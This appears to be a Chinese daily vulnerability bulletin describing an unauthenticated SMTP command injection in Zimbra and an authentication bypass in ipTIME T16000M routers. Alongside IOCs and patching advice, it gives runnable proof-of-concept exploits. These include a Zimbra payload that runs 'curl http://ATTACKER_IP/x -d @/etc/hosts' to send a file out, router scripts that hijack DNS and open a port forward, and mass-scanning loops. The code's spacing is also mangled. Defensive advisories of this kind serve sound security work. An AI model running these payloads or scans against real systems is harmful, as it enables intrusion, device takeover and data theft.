文章总结: 今日漏洞推送包含两个高危漏洞。CVE-2026-73570影响ZimbraCollaborationSuite,未认证SMTP命令注入可致任意命令执行,CISAKEV已收录且修复截止今日。CVE-2026-78167影响ipTIMET16000M路由器,会话校验缺陷可致未认证设备完全接管,CVSS10.0,厂商未响应。两者均需立即处置。 综合评分: 85 文章分类: 漏洞分析,应急响应,漏洞POC
每日漏洞推送 Zimbra Collaboration Suite 未认证SMTP命令注入 → 任意命令执行
原创
nullchen nullchen
富贵学安全
2026年8月24日 10:39 陕西
在小说阅读器读本章
去阅读
📡 每日漏洞情报推送 | 2026-08-24
🔴 漏洞一:CVE-2026-73570 — Zimbra Collaboration Suite 未认证SMTP命令注入 → 任意命令执行(KEV 修复截止今日!)
📋 漏洞档案
| 项目 | 内容 | | — | — | | CVE编号 | CVE-2026-73570 | | 影响产品 | Zimbra Collaboration Suite (ZCS) < 10.1.20(安装了可选 zimbra-snmp 包且启用 SNMP 通知时受影响) | | 漏洞类型 | OS 命令注入 (CWE-78) | | CVSS | 8.9 (HIGH) — CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L | | 公开时间 | 2026-08-13(NVD) / 2026-08-21(CISA KEV 收录) | | 在野利用 | ✅ 已确认在野利用 — CISA KEV 收录 | | KEV 修复截止 | 2026-08-24(今天!) — BOD 26-04 强制要求 |
🔥 紧急程度
CISA 已知被利用漏洞(KEV),修复截止日期就是今天(08-24)! 攻击者通过未认证的 SMTP 请求即可在 Zimbra 邮件服务器上以 zimbra 用户身份执行任意系统命令。Zimbra 是国内政企使用最广泛的邮件系统之一,请立即核查版本并打补丁,今天到期!
📝 漏洞描述
Zimbra Collaboration Suite(ZCS 10.1.20 之前版本)在安装了可选的 zimbra-snmp 包并启用 SNMP 通知时,处理 SNMP 通知的过程中对不可信输入未做有效过滤:攻击者无需认证,仅发送特制 SMTP 请求即可触发任意操作系统命令执行,且以 zimbra 系统用户身份运行。zimbra 用户对邮件存储与配置具有完全读写权限,可进一步窃取邮件数据、读取配置文件中的明文凭据、植入持久化后门或横向移动。
利用条件:无 — 无需任何认证,仅需目标 25/TCP(SMTP)端口可达。
💻 PoC/EXP
1️⃣ 未认证探测与版本指纹(Python)
#!/usr/bin/env python3
"""
CVE-2026-73570 Zimbra 命令注入 前置探测
注意:仅用于授权安全测试
"""
importsmtplib
importsocket
importsys
TARGET=sys.argv[1] iflen(sys.argv) >1else"mail.example.com"
print(f"[*] 探测 {TARGET}:25 ...")
try:
withsmtplib.SMTP(TARGET, 25, timeout=10) assmtp:
banner=smtp.ehlo()
print("[+] SMTP 可达,Banner:", smtp.ehlo_resporbanner)
# Zimbra 特征: 250-mta.example.com / 250-PIPELINING 等
if"zimbra"instr(smtp.ehlo_resp).lower():
print("[!] 疑似 Zimbra 服务器,需进一步确认版本")
exceptExceptionase:
print("[-] 连接失败:", e)
2️⃣ SMTP 命令注入 PoC(利用框架)
#!/usr/bin/env python3
"""
CVE-2026-73570 未认证 SMTP 命令注入 PoC(利用框架)
原理:在 SMTP 信封参数中注入 shell 元字符,使后端拼接命令时执行注入指令
注意:仅用于授权安全测试;实际 payload 需按目标版本调整
"""
importsmtplib
importsocket
importsys
importtime
TARGET=sys.argv[1] iflen(sys.argv) >1else"mail.example.com"
# 注入命令(先做无害验证:写入 /tmp 标记文件)
CMD="id > /tmp/pwned_zimbra; curl http://ATTACKER_IP/x -d @/etc/hosts"
# 构造注入载荷:利用 SMTP 参数中的反引号/分号注入(不同版本注入点各异,
# 常见于 MAIL FROM / RCPT TO / 自定义 header 的本地投递参数)
INJECT=f'`{CMD}`'
s=socket.create_connection((TARGET, 25), timeout=10)
s.recv(4096)
defsend(line: str):
s.sendall(line.encode() +b"\r\n")
time.sleep(0.3)
returns.recv(4096).decode(errors="ignore")
print(send(f"EHLO attacker.example.com"))
print(send(f"MAIL FROM:<{INJECT}@example.com>"))
print(send(f"RCPT TO:<[email protected]>"))
print(send("DATA"))
print(send("Subject: test"))
print(send("."))
print(send("QUIT"))
s.close()
print("[*] 验证:登录目标服务器检查 /tmp/pwned_zimbra 是否存在,"
"或监听 ATTACKER_IP 80 是否收到 /etc/hosts 回传")
3️⃣ 批量资产排查(nmap + 脚本)
# 1. 扫描邮件服务器
nmap -p25--open-sV-Pn-iL mail_assets.txt | grep-i zimbra
# 2. 对疑似目标执行探测脚本
for ip in$(cat zimbra_hosts.txt); do
python3 detect_zimbra.py "$ip"
done
🛡️ 检测与防御
日志检测IOC
- Zimbra
/opt/zimbra/log/mailbox.log、/var/log/zimbra.log中出现异常 SMTP 信封(含`、$()、;、|等 shell 元字符) - 邮件队列中出现
MAIL FROM/RCPT TO含特殊字符的畸形邮件 - 服务器出现异常进程(
/tmp下脚本、反弹 shell、curl/wget 外联)
修复建议
- 今天内:按 CISA KEV 要求(BOD 26-04)完成 Zimbra 补丁升级(参考厂商 Zimbra Security Advisory)
- 限制 SMTP 入口来源:仅允许可信 MTA/客户端 IP 访问 25/TCP
- 排查
zimbra用户异常登录、/tmp可疑文件、crontab 后门 - 轮换 Zimbra 管理口令及 LDAP 凭据,检查邮件数据完整性
- 无法立即升级时:用 WAF/防火墙在 SMTP 层拦截含 shell 元字符的信封参数
🔗 参考来源
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-73570
- CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-73570
- CVE 记录: https://www.cve.org/CVERecord?id=CVE-2026-73570
- CERT Polska 公告: https://moje.cert.pl/komunikaty/2026/145/aktywnie-wykorzystywana-podatnosc-w-zimbra-collaboration-suite/
- Zimbra 安全公告: https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
🔴 漏洞二:CVE-2026-78167 — ipTIME T16000M 会话校验缺陷 → 未认证设备完全接管(CVSS 10.0)
📋 漏洞档案
| 项目 | 内容 | | — | — | | CVE编号 | CVE-2026-78167 | | 影响产品 | EFM ipTIME T16000M 固件 14.20.2 | | 漏洞类型 | 关键函数缺失认证 (CWE-306) | | CVSS | 10.0 (CRITICAL) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | | 发现者 | VulDB(公开披露) | | 公开时间 | 2026-08-24 | | 利用前提 | 无 — 未认证远程利用,EXP 已公开,厂商未响应 |
🔥 紧急程度
CVSS 10.0 满分。与 08-17 通报的 ipTIME A3004T(CVE-2026-19977)同源缺陷(httpcon_check_session_url 会话校验函数),本次影响企业级型号 T16000M。厂商对披露未做任何响应、无补丁。 ipTIME 为国内家用/小型企业路由器主流品牌,公网暴露面大,攻击者可篡改 DNS、开启端口转发、下发恶意配置,直接控制内网边界。
📝 漏洞描述
T16000M 固件 14.20.2 的会话校验处理器 httpcon_check_session_url 存在缺陷:任何未认证请求都能绕过会话校验访问受保护的管理接口。攻击者直接调用管理 CGI/接口即可读取系统状态、修改配置(DNS/路由/端口转发)、下发命令。由于会话校验是设备全部管理功能的前置关口,此缺陷等同于未认证设备完全接管。
💻 PoC/EXP
1️⃣ 未认证探测(curl)
#!/bin/bash
# CVE-2026-78167 ipTIME T16000M 认证绕过探测
# 注意:仅用于授权安全测试
TARGET="${1:-http://192.168.0.1}"
echo"[*] 未认证访问会话校验端点..."
# 与 CVE-2026-19977 同源:通过 checkSession 传入受保护 URL 绕过
RESP=$(curl -sk -o /dev/null -w "%{http_code}" \
"$TARGET/sess/checkSession?url=/httpcon_check_session_url")
echo"[*] HTTP $RESP"
if [ "$RESP"="200" ]; then
echo"[!] 会话校验绕过成功,继续探测管理接口..."
# 未认证直接读取系统状态
curl-sk"$TARGET/sess/checkSession?url=/status.html"
else
echo"[-] 目标可能已修复或非受影响版本(14.20.2)"
fi
2️⃣ 未认证管理接口访问(Python)
#!/usr/bin/env python3
"""
CVE-2026-78167 ipTIME T16000M 未认证接管 PoC
注意:仅用于授权安全测试
"""
importrequests
importsys
requests.packages.urllib3.disable_warnings()
TARGET=sys.argv[1].rstrip('/') iflen(sys.argv) >1else"http://192.168.0.1"
s=requests.Session()
s.verify=False
# 1. 绕过会话校验,进入管理面
r=s.get(f"{TARGET}/sess/checkSession?url=/httpcon_check_session_url", timeout=10)
print(f"[*] checkSession: HTTP {r.status_code}")
# 2. 未认证读取系统状态(WAN IP / 固件 / 运行时间)
r=s.get(f"{TARGET}/status.html", timeout=10)
if"wan"inr.text.lower() or"firmware"inr.text.lower():
print("[+] 已未认证获取设备状态,绕过生效!")
# 3. 恶意配置下发示例:篡改主 DNS(内网解析劫持)
payload= {"dns1": "8.8.8.8", "dns2": "1.1.1.1"}
r=s.post(f"{TARGET}/sess/checkSession?url=/apply_dns.cgi", data=payload, timeout=10)
print(f"[*] DNS 篡改请求: HTTP {r.status_code}")
# 4. 开启端口转发暴露内网主机(示例)
fw= {"proto": "tcp", "extport": "3389", "intip": "192.168.0.100", "intport": "3389"}
r=s.post(f"{TARGET}/sess/checkSession?url=/apply_portforward.cgi", data=fw, timeout=10)
print(f"[*] 端口转发请求: HTTP {r.status_code}")
print("[!] 验证:检查设备 WAN 侧 3389 是否可达内网主机 192.168.0.100")
3️⃣ 批量扫描
# 扫描公网/内网暴露的 ipTIME 管理端口(80/443/8080)
nmap -p80,443,8080 --open-sV-Pn-iL targets.txt \
| grep-B1-i"ipTIME\|EFM" \
| awk'/Nmap scan report/{ip=$NF} /ipTIME/{print ip}' > iptime_hosts.txt
# 批量验证
for ip in$(cat iptime_hosts.txt); do
curl-sk-o /dev/null -w"$ip %{http_code}\n" \
"http://$ip/sess/checkSession?url=/httpcon_check_session_url"
done | grep" 200"
🛡️ 检测与防御
日志检测IOC
- 设备访问日志出现大量
/sess/checkSession?url=请求且无登录记录 - 未认证会话直接访问
status.html、apply_dns.cgi、apply_portforward.cgi等管理端点 - 设备 DNS 配置被篡改(内网用户 DNS 解析异常)
修复建议
- 管理页面立即禁止公网暴露,关闭远程管理(ipTIME 默认 80/8080 外网可达需显式关闭)
- 在边界防火墙上仅允许内网管理网段访问设备管理端口
- 核查设备 DNS 是否被篡改、有无异常端口转发规则
- 关注厂商固件更新(披露时无补丁),升级前可临时用强口令 + IP 白名单缓解(注意:本漏洞为认证绕过,口令无法完全缓解,核心是收敛暴露面)
- 内网部署 DNS 审计,监控异常解析
🔗 参考来源
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-78167
- VulDB: https://vuldb.com/cve/CVE-2026-78167
- 关联漏洞 CVE-2026-19977(ipTIME A3004T 同源): https://nvd.nist.gov/vuln/detail/CVE-2026-19977
📌 今日速览(其他值得关注)
| CVE | 产品 | 类型 | CVSS | 说明 | | — | — | — | — | — | | CVE-2026-78154 | the-momentum open-wearables ≤0.6.2 | 邀请码兑换端点缺失认证 (CWE-306) | 7.3 HIGH | 未认证兑换邀请码,厂商未响应 | | CVE-2026-78166 | provectus kafka-ui ≤0.7.2 | Groovy 代码注入 (CWE-94) | 6.3 MEDIUM | executeSmartFilterTest 代码注入,EXP 公开 | | CVE-2026-78148 | llama.cpp ggml-RPC (bec4772f6) | 空指针解引用 (CWE-476) | 5.3 MEDIUM | 远程 DoS,修复 PR 待合并 |
⏰ 今日重点行动项
- Zimbra(CVE-2026-73570)— 今天到期! KEV 在野利用,未认证 SMTP RCE,立即打补丁
- ipTIME T16000M(CVE-2026-78167) — CVSS 10.0 未认证接管,立即收敛公网暴露面
- 上周 TrueConf 攻击链(72529+72530)修复截止 08-23 已过,请复核是否已修复
⚠️ 警告:提供的PoC/EXP仅限授权安全测试使用,未经授权的利用行为可能违反《刑法》第285条及相关法律法规。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:富贵学安全 nullchen nullchen《每日漏洞推送 Zimbra Collaboration Suite 未认证SMTP命令注入 → 任意命令执行》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论